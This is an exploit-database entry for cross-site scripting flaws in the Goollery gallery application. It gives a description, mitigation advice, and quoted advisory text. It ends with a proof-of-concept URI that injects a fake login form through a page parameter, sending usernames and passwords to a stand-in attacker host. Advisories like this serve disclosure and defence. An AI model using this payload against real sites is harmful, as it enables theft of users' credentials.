header-logo
Suggest Exploit
vendor:
Goollery
by:
Unknown
5.5
CVSS
MEDIUM
Cross-site Scripting
79
CWE
Product Name: Goollery
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Cross-site Scripting Vulnerabilities in Goollery

The application Goollery is affected by various cross-site scripting vulnerabilities. These vulnerabilities occur when user-supplied URI input is not properly sanitized. Attackers can exploit these vulnerabilities by sending malicious HTML and script code through the 'page' parameter of certain scripts. If a victim user follows a malicious URI link, the hostile code may be rendered in their web browser.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly sanitize user-supplied input before using it in the application. This can be done by implementing input validation and output encoding techniques.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11587/info

It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 

These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts. 

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20na
me="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login
"></form>